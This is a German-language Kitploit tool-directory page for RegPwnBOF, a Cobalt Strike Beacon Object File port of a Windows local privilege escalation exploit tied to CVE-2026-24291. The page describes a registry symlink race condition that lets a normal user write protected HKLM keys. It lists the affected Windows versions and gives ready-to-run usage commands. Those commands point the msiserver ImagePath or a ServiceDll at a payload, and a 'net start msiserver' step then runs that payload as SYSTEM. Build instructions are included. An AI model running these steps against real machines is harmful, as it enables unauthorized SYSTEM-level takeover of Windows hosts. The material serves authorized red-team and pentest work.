Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
RegPwnBOF — Bof von RegPwn von MDSec | Kitploit
Tools/GitHubGitHub/flangvik/regpwnbof
Privilege EscalationExploitationPost-ExploitationPenetrationstestsRed Teaming
GitHubflangvik/regpwnbof

RegPwnBOF

Bof von RegPwn von MDSec

Repository anzeigen
12710vor 5 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

RegPwn BOF

Cobalt Strike BOF-Port des RegPwn-Exploits von Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach.

Dies ist eine schlampige BOF-Neuimplementierung des ursprünglichen C#-Exploits. Die gesamte Anerkennung für die Schwachstellenforschung und den Exploit geht an Filip Dragovic und MDSec.

  • Blogbeitrag: https://www.mdsec.co.uk/2026/03/rip-regpwn/
  • Original-Repository: https://github.com/mdsecactivebreach/RegPwn
  • CVE: CVE-2026-24291

Funktionsweise

Nutzt eine Registry-Symlink-Race-Condition im Windows-Bedienungshilfen-ATConfig-Mechanismus aus, um aus einem normalen Benutzerkontext heraus beliebige Werte in geschützte HKLM-Registry-Schlüssel zu schreiben (Lokale Privilegienausweitung).

Zielt auf Windows 11 25H2/24H2, Windows 10 21H2 und Windows Server 2016/2019/2022 vor dem Patch vom März 2026.

WARNUNG: Dieser Exploit sperrt die Workstation als Teil der Race-Condition.

Standardziel

Der msiserver-Dienst (Windows Installer) mit dem ImagePath. Dieser Dienst läuft als SYSTEM und kann von normalen Benutzern gestartet werden.

Verwendung

Cobalt Strike

Laden Sie regpwn.cna im Skript-Manager, dann:

root@kitploit:~
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll

Standalone-Test

root@kitploit:~
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath

Nachdem der Exploit erfolgreich war, starten Sie den Dienst, um als SYSTEM ausgeführt zu werden:

root@kitploit:~
net start msiserver

Erstellen

Erfordert x86_64-w64-mingw32-gcc (MinGW-w64 Cross-Compiler).

root@kitploit:~
make        # build BOF (regpwn.x64.o)
make test   # build standalone EXE (regpwn.x64.exe)
make clean

Nur x64.

Tool herunterladen